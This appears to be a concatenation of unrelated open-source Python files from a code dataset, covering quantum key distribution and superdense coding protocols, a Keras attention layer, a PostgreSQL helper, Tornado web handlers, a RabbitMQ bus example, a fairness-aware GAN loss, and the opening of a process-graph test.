r = self.exchange_messages(message_data={"ack": True}, message_type=BB84Message)
if not r.data["ack"]:
raise ProtocolException("Error distributing EPR states")
return x, theta
def _filter_theta(self, x, theta):
"""
Used to filter our measurements that were done with differing basis between the two peers in the protocol
:param x: list
A list of the measurement outcomes
:param theta: list
A list of the basis used for producing the measurement outcomes
:return: list
The remaining measurement outcomes with matching basis with our peer
"""
# Exchange basis information
response = self.exchange_messages(message_data={"theta": theta}, message_type=BB84Message)
theta_hat = response.data["theta"]
x_remain = []
for bit, basis, basis_hat in zip(x, theta, theta_hat):
# Only retain measurements that were performed in the same basis
if basis == basis_hat:
x_remain.append(bit)
return x_remain
def _estimate_error_rate(self, x):
"""
Estimates the error rate of the exchanged BB84 information
:param x: list
The measurement outcomes obtained
:param num_test_bits: int
The number of bits we should test
:return: float
The error rate of the communicated information
"""
test_bits = []
test_indices = []
# As leader we distribute the selected test indices
if self.role == LEADER_ROLE:
# Randomly choose a subset of indices to use for testing
while len(test_indices) < ROUND_SIZE // 4 and len(x) > 0:
# Choose a index we still have
index = random.randint(0, len(x) - 1)
# Store the test bit and index
test_bits.append(x.pop(index))
test_indices.append(index)
# Send the information and wait for an acknowledgement
r = self.exchange_messages(message_data={"test_indices": test_indices}, message_type=BB84Message)
if not r.data["ack"]:
raise ProtocolException("Error sending test indices")
# As follower we receive the test indices
elif self.role == FOLLOW_ROLE:
# Receive the indices and respond with an acknowledgment
m = self.exchange_messages(message_data={"ack": True}, message_type=BB84Message)
test_indices = m.data["test_indices"]
# Construct the test bit information on our end
for index in test_indices:
test_bits.append(x.pop(index))
# Exchange test bits with our peer
m = self.exchange_messages(message_data={"test_bits": test_bits}, message_type=BB84Message)
target_test_bits = m.data["test_bits"]
# Calculate the error rate of same basis bits
num_error = 0
for t1, t2 in zip(test_bits, target_test_bits):
if t1 != t2:
num_error += 1
# Conclude the error estimation with our peer
r = self.exchange_messages(message_data={"fin": True}, message_type=BB84Message)
if not r.data["fin"]:
raise ProtocolException("Error coordinating error estimation")
if test_bits:
error = (num_error / len(test_bits))
else:
error = 1
return error
def _reconcile_information(self, x, ecc=ECC_Golay()):
"""
Information Reconciliation based on linear codes
:param x: list
Set of codewords
:return: bytes
Bytestring of reconciled information
"""
reconciled = []
# Iterate through the codewords we have available
for codeword in ecc.chunk(x):
# Recycle any remaining codeword bits and the reconciled information
if len(codeword) < ecc.codeword_length:
return codeword, reconciled
# As leader we send a syndrome string of the information we have
if self.role == LEADER_ROLE:
# Encode the codeword and send the information
s = ecc.encode(codeword)
m = self.exchange_messages(message_data={"s": s}, message_type=BB84Message)
if not m.data["ack"]:
raise ProtocolException("Failed to reconcile secrets")
# As follower we receive the error correcting codes and correct information on our end
elif self.role == FOLLOW_ROLE:
m = self.exchange_messages(message_data={"ack": True}, message_type=BB84Message)
s = m.data["s"]
# Store the reconciled information
reconciled += ecc.decode(codeword, s)
# Managed to have all valid length codewords, no remaining secret bits
return [], reconciled
def _amplify_privacy(self, X):
"""
One-round privacy amplification sourced from https://eprint.iacr.org/2010/456.pdf
:param X: bytes
A bytestring of the information we wish to distill
:return: byte
Privacy amplified byte from X
"""
# As leader we select an Y to use as a seed for our extractor
if self.role == LEADER_ROLE:
# Select the seed
Y = random.randint(0, 2 ** 8 - 1)
# Calculate the extracted data and tag
temp = (Y * X[0]).to_bytes(2, 'big')
R = temp[0]
T = temp[1] + X[1]
# Send seed and tag to peer
m = self.exchange_messages(message_data={"Y": Y, "T": T}, message_type=BB84Message)
# If failure some information may not have been correctly reconciled
if not m.data["ack"]:
return b''
# As follower we receive the seed and tag and verify the extracted data
elif self.role == FOLLOW_ROLE:
# Get seed/tag from peer
m = self._wait_for_control_message(message_type=BB84Message)
Y = m.data["Y"]
T = m.data["T"]
# Calculate the extracted information on our end
temp = (Y * X[0]).to_bytes(2, 'big')
# Verify the tag
if T != X[1] + temp[1]:
self._send_control_message(message_data={"ack": False}, message_type=BB84Message)
return b''
# Get extracted randomness if tag passes
R = temp[0]
self._send_control_message(message_data={"ack": True}, message_type=BB84Message)
# Return extracted byte
return R.to_bytes(1, 'big')
def distill_tested_data(self):
"""
A wrapper for distributing the BB84 states between the two users and tests the error rate
of the measured data
:return: list
A list of the shared secret bits
"""
# Get measurement/basis data
x, theta = self._receive_bb84_states()
# Filter measurements we didn't match bases on
x_remain = self._filter_theta(x=x, theta=theta)
# Calculate the error rate of test information, remove the test data
error_rate = self._estimate_error_rate(x_remain)
# Abort the protocol if we have to high of an error rate to reconcile information with
if error_rate >= MAX_GOLAY_ERROR:
return []
# Return the secret data
return x_remain
def execute(self):
"""
A wrapper for the entire key derivation protocol
:return: bytes
Derived key of byte length key_size
"""
self.logger.info("Beginning protocol {}".format(self.name))
key = b''
secret_bits = []
reconciled = []
# Continue the protocol until we have a full key
while len(key) < self.key_size:
# Privacy amplification requires two bytes of reconciled data
while len(reconciled) < 2*BYTE_LEN:
# Golay Error Correction requires 23 bits of data per code word
while len(secret_bits) < ECC_Golay.codeword_length:
secret_bits += self.distill_tested_data()
self.logger.debug("Secret bits: {}".format(secret_bits))
# Reconcile codeword multiple of bits from the exchanged information
secret_bits, reconciled_bits = self._reconcile_information(secret_bits)
reconciled += reconciled_bits
self.logger.debug("Reconciled: {}".format(reconciled))
# Convert the reconciled data into bytes that can be passed to privacy amplifcation
reconciled_bytes = int(''.join([str(i) for i in reconciled[:2*BYTE_LEN]]), 2).to_bytes(2, 'big')
reconciled = reconciled[2*BYTE_LEN:]
# Extract randomness from our reconciled information
key += self._amplify_privacy(reconciled_bytes)
self.logger.debug(key)
self.logger.info("Generated {} of {} bytes".format(len(key), self.key_size))
self.logger.debug("Derived key {}".format(key))
self._end_protocol()
return key
class DIQKD(BB84_Purified):
"""
Implements a device independent version of the purified BB84 protocol
Currently the logic for the EPR CHSH test appears sound, though the devices used
do not implement measurements that approach the CHSH maximum winning probability
"""
name = "DIQKD"
message_type = DQKDMessage
def _device_independent_distribute_bb84(self):
"""
Implements the leading role of the DIQKD protocol
:return: tuple of lists
The measurement/basis information obtained
"""
# Prepare our random set of measurements
theta = [random.randint(0, 1) for _ in range(ROUND_SIZE)]
x = []
for b in theta:
# As leader we request an EPR pair from the source
self.device.requestEPR(self.peer_info["user"])
# Grab our half of te EPR pair
q = self.device.receiveEPR()
# Have our device measure the qubit for us
x.append(self.device.measure(q, b))
# Let peer know we are ready to proceed
m = self.exchange_messages(message_data={"ack": True}, message_type=DQKDMessage)
if not m.data["ack"]:
raise ProtocolException("Error distributing DI states")
return x, theta
def _device_independent_receive_bb84(self):
"""
Implements the following role of the DIQKD protocol
:return: tuple of lists
The measurement/basis information
"""
# Prepare our random set of measurements
theta = [random.randint(0, 2) for _ in range(ROUND_SIZE)]
x = []
for b in theta:
# Receive our half of the EPR
q = self.device.receiveEPR()
# Have our device measure the qubit for us
x.append(self.device.measure(q, b))
# Let peer know we are ready to proceed
m = self.exchange_messages(message_data={"ack": True}, message_type=DQKDMessage)
if not m.data["ack"]:
raise ProtocolException("Error receiving DI states")
return x, theta
def _device_independent_epr_test(self, x, theta):
"""
Implements the CHSH EPR test for the DIQKD protocol, tests whether a subset of test bits
are entangled
:param x: list
A list of the measurement outcomes
:param theta: list
A list of the basis used for producing the measurement outcomes
:return: list
The remaining measurement outcomes with matching basis with our peer
"""
# Exchange basis information with our peer
m = self.exchange_messages(message_data={"theta": theta}, message_type=DQKDMessage)
theta_hat = m.data["theta"]
# As the leader we will compute the indices comprising the test set
if self.role == LEADER_ROLE:
# Uniformly random subset
T = random.sample(range(len(x)), len(x) // 2)
# Let our peer know what the subset is
self._send_control_message(message_data={"T": T}, message_type=DQKDMessage)
# Tp is the subset of test rounds we will use for the CHSH test
Tp = [j for j in T if theta_hat[j] in [0, 1]]
# Tpp is the subset of test rounds we will use for a matching test
Tpp = [j for j in T if theta[j] == 0 and theta_hat[j] == 2]
# R is the remaining bits not in the test set
R = [j for j in set(range(len(x))) - set(T) if theta[j] == 0 and theta_hat[j] == 2]
# As the follower we will construct the test set as per the leader's specification
elif self.role == FOLLOW_ROLE:
# Wait for the test indices
m = self._wait_for_control_message(message_type=DQKDMessage)
T = m.data["T"]
# Tp is the subset of test rounds we will use for the CHSH test
Tp = [j for j in T if theta[j] in [0, 1]]
# Tpp is the subset of test rounds we will use for a matching test
Tpp = [j for j in T if theta_hat[j] == 0 and theta[j] == 2]
# R is the remaining bits not in the test set
R = [j for j in set(range(len(x))) - set(T) if theta_hat[j] == 0 and theta[j] == 2]
# Now we exchange the actual test measurements for the tests
x_T = [x[j] for j in T]
m = self.exchange_messages(message_data={"x_T": x_T}, message_type=DQKDMessage)
x_T_hat = m.data["x_T"]
# Calculate the number of rounds that pass the CHSH game
winning = [j for j, x1, x2 in zip(T, x_T, x_T_hat) if (x1 ^ x2) == (theta[j] & theta_hat[j]) and j in Tp]
# Calculate the probability of winning the CHSH game using the device's implemented measurements
p_win = len(winning) / len(Tp)
# Calculate the number of rounds that matched when measured in the "same basis"
matching = [j for j, x1, x2 in zip(T, x_T, x_T_hat) if x1 == x2 and j in Tpp]
# Calculate the error rate of the "same basis" measurements
p_match = len(matching) / len(Tpp)
# Set the tolerance for the test results
e = 0.1
if p_win < PCHSH - e or p_match < 1 - e:
self.logger.debug(x_T)
self.logger.debug(x_T_hat)
self.logger.debug("CHSH Winners: {} out of {}".format(len(winning), Tp))
self.logger.debug("Matching: {} out of {}".format(len(matching), Tpp))
raise ProtocolException("Failed to pass CHSH test: p_win: {} p_match: {}".format(p_win, p_match))
# Return the remaining secret measurement results
x_remain = [x[r] for r in R]
return x_remain
def distill_device_independent_data(self):
"""
Filters out any measurements that were not performed in accordance with the peer
:return: list
A list of measurement outcomes
"""
# Obtain sets of measurement/basis
if self.role == LEADER_ROLE:
x, theta = self._device_independent_distribute_bb84()
elif self.role == FOLLOW_ROLE:
x, theta = self._device_independent_receive_bb84()
self.logger.debug("Beginning EPR Tests")
# Test some of the data to ensure the devices we are using "qualify"
x_remain = self._device_independent_epr_test(x, theta)
return x_remain
def execute(self):
"""
A wrapper for the entire key derivation protocol
:return: bytes
Derived key of byte length key_size
"""
self.logger.info("Beginning protocol {}".format(self.name))
key = b''
secret_bits = []
reconciled = []
# Continue the protocol until we have a full key
while len(key) < self.key_size:
# Privacy amplification requires two bytes of reconciled data
while len(reconciled) < 2*BYTE_LEN:
# Golay Error Correction requires 23 bits of data per code word
while len(secret_bits) < ECC_Golay.codeword_length:
secret_bits += self.distill_device_independent_data()
self.logger.debug("Secret bits: {}".format(secret_bits))
# Reconcile codeword multiple of bits from the exchanged information
secret_bits, reconciled_bits = self._reconcile_information(secret_bits)
reconciled += reconciled_bits
self.logger.debug("Reconciled: {}".format(reconciled))
# Convert the reconciled data into bytes that can be passed to privacy amplifcation
reconciled_bytes = int(''.join([str(i) for i in reconciled[:2*BYTE_LEN]]), 2).to_bytes(2, 'big')
reconciled = reconciled[2*BYTE_LEN:]
# Extract randomness from our reconciled information
key += self._amplify_privacy(reconciled_bytes)
self.logger.debug(key)
self.logger.info("Generated {} of {} bytes".format(len(key), self.key_size))
self.logger.debug("Derived key {}".format(key))
self._end_protocol()
return key
class QChatMessageProtocol(QChatProtocol):
"""
Base class for qubit based messaging protocols
"""
def _lead_protocol(self):
"""
Sends the protocol message that initiates the protocol
:return: None
"""
self._send_control_message(message_data={"name": self.name}, message_type=PTCLMessage)
response = self._wait_for_control_message(message_type=self.message_type)
if response.data["ACK"] != "ACK":
raise ProtocolException("Failed to establish leader/role")
def _follow_protocol(self):
"""
Responds to the protocol message so that peers are in sync
:return: None
"""
self._send_control_message(message_data={"ACK": "ACK"}, message_type=self.message_type)
def _end_protocol(self):
"""
Sends a FINish message to mark the end of the protocol
:return: None
"""
m = self.exchange_messages(message_data={"FIN": True}, message_type=self.message_type)
if not m.data["FIN"]:
raise ProtocolException("Failed to terminate {} protocol".format(self.name))
class SuperDenseCoding(QChatMessageProtocol):
"""
Implements sending SuperDense Coded data
"""
name = "SUPERDENSE"
message_type = SPDSMessage
def send_message(self, message):
"""
Implements streaming data to the user using qubits
:param message: bytes
A bytestring representing the data to send
:return: None
"""
self.logger.info("Beginning protocol {}".format(self.name))
# Grab our peer's cqc host name
user = self.peer_info["user"]
m = self.exchange_messages(message_data={"message_length": len(message)}, message_type=self.message_type)
if not m.data["ack"]:
raise ProtocolException("Failed to transmit message length")
# Process each byte of the message individually
for b in message:
# Process the bits of the message in pairs
for p in range(4):
# Obtain the bits from the byte
b2 = (b >> 2*p) & 1
b1 = (b >> (2*p) + 1) & 1
# Share an EPR state with our peer
qa = self.connection.cqc.createEPR(user)
# Let our peer know their half of the EPR is ready
m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
if not m.data["ack"]:
raise ProtocolException("Failed to send {}'s qubit".format(user))
# Encode the bits into our half of the EPR pair
if b2:
qa.X()
if b1:
qa.Z()
# Transmit our half to our peer
self.connection.cqc.sendQubit(qa, user)
# Let our peer know they can receive our half
m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
if not m.data["ack"]:
raise ProtocolException("Failed to send EPR to {}".format(user))
# Wait until our peer is ready to receive next EPR
m = self._wait_for_control_message(message_type=self.message_type)
if not m.data["ack"]:
raise ProtocolException("Failed to send EPR to {}".format(user))
self._end_protocol()
def receive_message(self):
"""
Receives a superdense coded message
:return: bytes
Bytestring encoding the received message
"""
self.logger.info("Beginning protocol {}".format(self.name))
user = self.peer_info["user"]
# Get the message length from the sender
m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
message_length = m.data["message_length"]
message = b''
for b in range(message_length):
b = 0
for p in range(4):
# Wait to know that EPR is ready
m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
if not m.data["ack"]:
raise ProtocolException("Failed to receive half of EPR")
# Get EPR half
qb = self.connection.cqc.recvEPR()
# Wait for peer to finish encoding
m = self.exchange_messages(message_data={"ack": True}, message_type=self.message_type)
if not m.data["ack"]:
raise ProtocolException("Failed to obtain {}'s half of the EPR".format(user))
# Get peer's half of the EPR
qa = self.connection.cqc.recvQubit()
# Decode the encoded information
qa.cnot(qb)
qa.H()
b1 = qa.measure()
b2 = qb.measure()
# Store it in our current byte
b |= (b2 << 2*p)
b |= (b1 << (2*p + 1))
# Let our peer know we are ready for the next EPR pair
self._send_control_message(message_data={"ack": True}, message_type=self.message_type)
message += b.to_bytes(1, 'big')
self.logger.info("Received SuperDense message from {}: {}".format(user, message))
self._end_protocol()
return message
class ProtocolFactory:
"""
Simple factory that resolves a protocol's name to the class object
"""
def __init__(self):
self.protocol_mapping = {
BB84_Purified.name: BB84_Purified,
DIQKD.name: DIQKD,
SuperDenseCoding.name: SuperDenseCoding
}
def createProtocol(self, name):
return self.protocol_mapping.get(name)
| StarcoderdataPython |
3259207 | <reponame>klarh/geometric_algebra_attention<filename>geometric_algebra_attention/keras/Multivector2MultivectorAttention.py
from tensorflow import keras
from .. import base
from .MultivectorAttention import MultivectorAttention
class Multivector2MultivectorAttention(base.Multivector2MultivectorAttention, MultivectorAttention):
__doc__ = base.Multivector2MultivectorAttention.__doc__
def __init__(self, score_net, value_net, scale_net, reduce=True,
merge_fun='mean', join_fun='mean', rank=2,
invariant_mode='single', covariant_mode='partial',
include_normalized_products=False, **kwargs):
base.Multivector2MultivectorAttention.__init__(self, scale_net=scale_net)
MultivectorAttention.__init__(
self, score_net=score_net, value_net=value_net,
reduce=reduce, merge_fun=merge_fun, join_fun=join_fun, rank=rank,
invariant_mode=invariant_mode, covariant_mode=covariant_mode,
include_normalized_products=include_normalized_products,
**kwargs)
@classmethod
def from_config(cls, config):
new_config = dict(config)
for key in ('scale_net',):
new_config[key] = keras.models.Sequential.from_config(new_config[key])
return super(Multivector2MultivectorAttention, cls).from_config(new_config)
def get_config(self):
result = super().get_config()
result['scale_net'] = self.scale_net.get_config()
return result
keras.utils.get_custom_objects()['Multivector2MultivectorAttention'] = Multivector2MultivectorAttention
| StarcoderdataPython |
1928577 | import os
from dotenv import load_dotenv
import psycopg2
import traceback
load_dotenv("./.env.local")
con = cur = db = None
if 'DATABASE_URI' in os.environ:
DATABASE_URL = os.environ['DATABASE_URI']
else:
raise ValueError('Env Var not found!')
def connect():
global con, cur, db
try:
con = psycopg2.connect(DATABASE_URL, sslmode='require')
cur = con.cursor()
db = cur.execute
except psycopg2.DatabaseError as err:
if con:
con.rollback()
print(err)
def get_db(force=False):
if force:
con.rollback()
return (con, cur, db)
if not (con and cur and db):
connect()
return (con, cur, db)
def useDb(defaultReturn=None):
def wrapper(func=None):
def inner(*args, **kwargs):
con, cur, db = get_db()
if "retrying" in kwargs and kwargs["retrying"]:
try:
print("Retrying query")
del kwargs["retrying"]
kwargs.update({"con": con, "cur": cur, "db": db, })
return func(*args, **kwargs)
except:
print(traceback.format_exc())
print(defaultReturn)
return defaultReturn
try:
kwargs.update({"con": con, "cur": cur, "db": db, })
return func(*args, **kwargs)
except psycopg2.DatabaseError:
print(traceback.format_exc())
if "retrying" in kwargs:
raise RuntimeError("Fatal Error occured!")
else:
con, cur, db = get_db(force=True)
return inner(*args, **kwargs, retrying=True)
except:
print(traceback.format_exc())
return defaultReturn
return inner
return wrapper
| StarcoderdataPython |
1679817 | <gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# author <NAME> <EMAIL>
# date 2015/11/27
import baseHandler
import tornado.web
from modules.db import db
import constants
import json
"""
determine whether the specified category is exist
"""
class IsCategoryExistHandler(baseHandler.RequestHandler):
@tornado.web.authenticated
def get(self):
category = self.get_query_argument('cate_name', None)
if category:
query_exist = 'select count(*) count from tb_category where name = %s and user_id = %s'
num = db.get(query_exist, category, self.current_user.id)
if num and num.count:
self.write({'success': True, 'exist': True})
self.finish()
return
elif not num.count:
self.write({'success': True, 'exist': False})
self.finish()
return
self.write({'success': False, 'error_code': constants.error_code['missing_parameters']})
self.finish()
"""
add new category
"""
class AddHandler(baseHandler.RequestHandler):
@tornado.web.authenticated
def post(self):
category = self.get_body_argument('cate_name')
if category:
query_exist = 'select count(*) count from tb_category where name = %s and user_id = %s'
num = db.get(query_exist, category, self.current_user.id)
if num and num.count:
self.write({'success': False, 'error_code': constants.error_code['category_already_exist']})
self.finish()
return
query_new = 'insert into tb_category (name, user_id, visible) values (%s, %s, %s)'
id = db.insert(query_new, category, self.current_user.id, 1)
if id:
self.write({'success': True, 'category_id': id})
self.finish()
"""
batch delete categories
"""
class BatchDeleteHandler(baseHandler.RequestHandler):
@tornado.web.authenticated
def post(self):
categories = self.get_body_argument('categories', None)
if categories:
if categories.find(',') > -1:
catesArray = categories.split(',')
for i in range(0, len(catesArray)):
catesArray[i] = int(catesArray[i])
batch_delete = 'delete from tb_category where id in {0}'.format(tuple(catesArray))
else:
batch_delete = 'delete from tb_category where id = {0}'.format(int(categories))
db.execute(batch_delete)
self.write({'success': True})
self.finish()
| StarcoderdataPython |
5083621 | <reponame>aherrera1721/hyhelper<filename>HyHelper/__init__.py
from .HyHelper_traj import *
from .HyHelper_plot import *
from .HyHelper_filters import *
from .AutoSplit import *
print('All files imported successfully. Welcome to HyHelper!') | StarcoderdataPython |
5063851 | import pika
import datetime
from PikaBus.abstractions.AbstractPikaBus import AbstractPikaBus
from PikaBus.PikaBusSetup import PikaBusSetup
def MessageHandlerMethod(**kwargs):
"""
A message handler method may simply be a method with som **kwargs.
The **kwargs will be given all incoming pipeline data, the bus and the incoming payload.
"""
data: dict = kwargs['data']
bus: AbstractPikaBus = kwargs['bus']
payload: dict = kwargs['payload']
print(payload)
if payload['reply']:
payload['reply'] = False
bus.Reply(payload=payload)
# Use pika connection params to set connection details
credentials = pika.PlainCredentials('amqp', 'amqp')
connParams = pika.ConnectionParameters(
host='localhost',
port=5672,
virtual_host='/',
credentials=credentials)
# Create a PikaBusSetup instance with a listener queue, and add the message handler method.
pikaBusSetup = PikaBusSetup(connParams,
defaultListenerQueue='myQueue',
defaultSubscriptions='myTopic')
pikaBusSetup.AddMessageHandler(MessageHandlerMethod)
# Start consuming messages from the queue.
pikaBusSetup.StartConsumers()
# Create a temporary bus to subscribe on topics and send, defer or publish messages.
bus = pikaBusSetup.CreateBus()
bus.Subscribe('myTopic')
payload = {'hello': 'world!', 'reply': True}
# To send a message means sending a message explicitly to one receiver.
bus.Send(payload=payload, queue='myQueue')
# To defer a message means sending a message explicitly to one receiver with some delay before it is processed.
bus.Defer(payload=payload, delay=datetime.timedelta(seconds=1), queue='myQueue')
# To publish a message means publishing a message on a topic received by any subscribers of the topic.
bus.Publish(payload=payload, topic='myTopic')
input('Hit enter to stop all consuming channels \n\n')
pikaBusSetup.StopConsumers()
| StarcoderdataPython |
3251557 | <filename>end_to_end_tests/golden-record-custom/custom_e2e/__init__.py<gh_stars>0
""" A client library for accessing My Test API """
from .wrapper import MyTestAPIClient, SyncMyTestAPIClient
| StarcoderdataPython |
287583 | <reponame>tagr-dev/tagr
import unittest
import pandas as pd
from tagr.tagging.artifacts import Tagr
class TaggingTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
self.tag = Tagr()
super().__init__(*args, **kwargs)
def test_artfact_is_returned(self):
# Arrange
test_artifact = "foo"
# Act
res = self.tag.save(test_artifact, "str1", "primitive")
# Assert
self.assertEqual(res, "foo")
def test_save_other(self):
test_artifact = {"test_key": "test_val"}
res = self.tag.save(test_artifact, "dict1", "other")
self.assertEqual(res, {"test_key": "test_val"})
def test_save_with_no_dtype(self):
test_artifact = "foo"
self.assertRaises(
ValueError, lambda: self.tag.save(test_artifact, "unrecognized_obj")
)
def test_save_with_unrecognized_dtype(self):
test_artifact = "foo"
queue_length = len(self.tag.ret_queue())
self.assertRaises(
ValueError,
lambda: self.tag.save(test_artifact, "misnamed_dtype", "primitiveS"),
)
self.assertEqual(queue_length, 0)
def test_save_with_wrong_dtype(self):
test_artifact = "foo"
self.assertRaises(TypeError, lambda: self.tag.save(test_artifact, "X_train"))
def test_obj_name_to_dtype_conversion(self):
data = [{"a": 1, "b": 2, "c": 3}, {"a": 10, "b": 20, "c": 30}]
df = pd.DataFrame(data)
self.tag.save(df, "X_train")
df_dtype = self.tag.ret_queue()["X_train"].dtype
self.assertEqual(df_dtype, "dataframe")
# test aliasing
test_int = 2
self.tag.save(test_int, "num", "primitive")
int_dtype = self.tag.ret_queue()["num"].dtype
self.assertEqual(int_dtype, "primitive")
def test_ignore_dupes(self):
self.tag = Tagr()
self.tag.save(2, "num", "primitive")
self.tag.save(2, "num", "primitive")
queue_length = len(self.tag.ret_queue())
self.assertEqual(queue_length, 1)
def test_rm(self):
expected_length = 1
expected_val = 2
self.tag = Tagr()
self.tag.save(1, "int1", "primitive")
self.tag.save(2, "int2", "primitive")
self.tag.rm("int1")
queue = self.tag.ret_queue()
queue_length = len(queue)
stored_int = queue["int2"].val
self.assertEqual(queue_length, expected_length)
self.assertEqual(expected_val, stored_int)
def test_rm_error_handling(self):
self.tag = Tagr()
self.assertRaises(KeyError, lambda: self.tag.rm("non_existent_obj"))
def test_summary(self):
data = [
{"obj_name": "num1", "val": 2.0, "dtype": "primitive"},
{"obj_name": "str1", "val": "foo", "dtype": "primitive"},
]
expected_df = pd.DataFrame(data)
self.tag = Tagr()
self.tag.save(2, "num1", "primitive")
self.tag.save("foo", "str1", "primitive")
summary = self.tag.summary()
pd._testing.assert_frame_equal(summary, expected_df)
| StarcoderdataPython |
349295 | <filename>test/solution_tests/chk/test_pricing_service.py
from lib.solutions.CHK.pricing_service import PricingService
from lib.solutions.CHK.sku_service import SkuService
from unittest.mock import MagicMock
from pytest import mark
# getting a bit like an integration test here
@mark.parametrize("basket_string,expected_output", [
("A", 50),
("AA", 100),
("AAA", 130),
("AAAA", 180),
("AAAAA", 200),
("AAAAAAAA", 330),
("ABCDABCD", 215),
("EE", 80),
("EEB", 80),
("EEBB", 110),
("EEBBB", 125),
("EEBBBBB", 170),
("EEEEBB", 160),
('BDEEE', 135),
("FF", 20),
("FFF", 20),
("FEFEBF", 100),
("H", 10),
("HHHHH", 45),
("HHHHHHHHHH", 80),
("HHHHHHHHHHHHHHH", 125),
("KK", 120),
("NNN", 120),
("MNNN", 120),
("PPPPP", 200),
("QQQ", 80),
("RRR", 150),
("RQRR", 150),
("UUU", 120),
("UUUU", 120),
("VV", 90),
("VVV", 130),
("STY", 45),
("XXX", 45),
("ZYX", 45),
("ZY", 41),
("XXXST", 79),
("XXXXXXXXX", 135),
("SSSZ", 65),
("ZZZS", 65)
])
def test_get_price(basket_string, expected_output):
sku_service = SkuService()
service = PricingService(sku_service)
sku_service.load_from_json_file('lib/solutions/chk/skus.json')
price = service.get_price(basket_string)
assert price == expected_output
| StarcoderdataPython |
5045743 | import torch
import torch.nn.functional as f
from torch import nn
import numpy as np
import pandas as pd
class Critic(nn.Module):
def __init__(self, input_dim):
super(Critic, self).__init__()
self._input_dim = input_dim
# self.dense1 = nn.Linear(109, 256)
self.dense1 = nn.Linear(self._input_dim, self._input_dim)
self.dense2 = nn.Linear(self._input_dim, self._input_dim)
# self.dense3 = nn.Linear(256, 1)
# self.drop = nn.Dropout(p=0.2)
# self.activation = nn.Sigmoid()
def forward(self, x):
x = f.leaky_relu(self.dense1(x))
# x = self.drop(x)
# x = f.leaky_relu(self.dense2(x))
x = f.leaky_relu(self.dense2(x))
# x = self.drop(x)
return x
class Generator(nn.Module):
def __init__(self, input_dim, continuous_columns, discrete_columns):
super(Generator, self).__init__()
self._input_dim = input_dim
self._discrete_columns = discrete_columns
self._num_continuous_columns = len(continuous_columns)
self.lin1 = nn.Linear(self._input_dim, self._input_dim)
self.lin_numerical = nn.Linear(self._input_dim, self._num_continuous_columns)
self.lin_cat = nn.ModuleDict()
for key, value in self._discrete_columns.items():
self.lin_cat[key] = nn.Linear(self._input_dim, value)
def forward(self, x):
x = torch.relu(self.lin1(x))
# x = f.leaky_relu(self.lin1(x))
# x_numerical = f.leaky_relu(self.lin_numerical(x))
x_numerical = f.relu(self.lin_numerical(x))
x_cat = []
for key in self.lin_cat:
x_cat.append(f.gumbel_softmax(self.lin_cat[key](x), tau=0.2))
x_final = torch.cat((x_numerical, *x_cat), 1)
return x_final
class DISPLoss(nn.Module):
def __init__(self, S_start_index, Y_start_index, underpriv_index, priv_index, undesire_index, desire_index):
super(DISPLoss, self).__init__()
self._S_start_index = S_start_index
self._Y_start_index = Y_start_index
self._underpriv_index = underpriv_index
self._priv_index = priv_index
self._undesire_index = undesire_index
self._desire_index = desire_index
def forward(self, x, crit_fake_pred, lamda, nu):
G = x[:, self._S_start_index:self._S_start_index + 2]
# print(x[0,64])
I = x[:, self._Y_start_index:self._Y_start_index + 2]
# disp = (torch.mean(G[:,1]*I[:,1])/(x[:,65].sum())) - (torch.mean(G[:,0]*I[:,0])/(x[:,64].sum()))
# disp = -1.0 * torch.tanh(torch.mean(G[:,0]*I[:,1])/(x[:,64].sum()) - torch.mean(G[:,1]*I[:,1])/(x[:,65].sum()))
# gen_loss = -1.0 * torch.mean(crit_fake_pred)
disp = -1.0 * lamda * (torch.mean(G[:, self._underpriv_index] * I[:, self._desire_index]) / (
x[:, self._S_start_index + self._underpriv_index].sum()) - torch.mean(
G[:, self._priv_index] * I[:, self._desire_index]) / (
x[:, self._S_start_index + self._priv_index].sum())) - 1.0 * torch.mean(
crit_fake_pred)
# teste de oversampling de grupos sensiveis
taxa_missing_data = nu * (torch.mean(torch.abs((x[:, self._S_start_index + self._priv_index].sum() -
x[:, self._S_start_index + self._underpriv_index].sum())) / x[:, self._S_start_index + self._underpriv_index].size(axis=0)))
#novo disp
disp = disp
# print(disp)
return disp
class RTRLoss(nn.Module):
def __init__(self, S_start_index, Y_start_index, underpriv_index, priv_index, undesire_index, desire_index):
super(RTRLoss, self).__init__()
self._S_start_index = S_start_index
self._Y_start_index = Y_start_index
self._underpriv_index = underpriv_index
self._priv_index = priv_index
self._undesire_index = undesire_index
self._desire_index = desire_index
def forward(self, x, crit_fake_pred, lamda, nu):
G = x[:, self._S_start_index:self._S_start_index + 2]
# print(x[0,64])
I = x[:, self._Y_start_index:self._Y_start_index + 2]
# disp = (torch.mean(G[:,1]*I[:,1])/(x[:,65].sum())) - (torch.mean(G[:,0]*I[:,0])/(x[:,64].sum()))
# disp = -1.0 * torch.tanh(torch.mean(G[:,0]*I[:,1])/(x[:,64].sum()) - torch.mean(G[:,1]*I[:,1])/(x[:,65].sum()))
# gen_loss = -1.0 * torch.mean(crit_fake_pred)
disp = -1.0 * lamda * (torch.mean(G[:, self._underpriv_index] * I[:, self._desire_index]) / (
x[:, self._S_start_index + self._underpriv_index].sum()) - torch.mean(
G[:, self._priv_index] * I[:, self._desire_index]) / (
x[:, self._S_start_index + self._priv_index].sum())) - 1.0 * torch.mean(
crit_fake_pred)
# teste de oversampling de grupos sensiveis
taxa_missing_data = nu * (torch.mean(torch.abs((x[:, self._S_start_index + self._priv_index].sum() -
x[:, self._S_start_index + self._underpriv_index].sum())) / x[:, self._S_start_index + self._underpriv_index].size(axis=0)))
#novo disp
disp = taxa_missing_data
# print(disp)
return disp | StarcoderdataPython |
3352359 | <gh_stars>1-10
from unittest.mock import MagicMock, call, ANY
import pytest
from openeo.internal.process_graph_visitor import ProcessGraphVisitor
def test_visit_node():
node = {
"process_id": "cos",
"arguments": {"x": {"from_argument": "data"}}
}
visitor = ProcessGraphVisitor()
visitor.enterProcess = MagicMock()
visitor.enterArgument = MagicMock()
visitor.accept_node(node)
assert visitor.enterProcess.call_args_list == [
call(process_id="cos", arguments={"x": {"from_argument": "data"}}, namespace=None)
]
assert visitor.enterArgument.call_args_list == [call(argument_id="x", value={"from_argument": "data"})]
def test_visit_node_namespaced():
node = {
"process_id": "cos",
"namespace": "math",
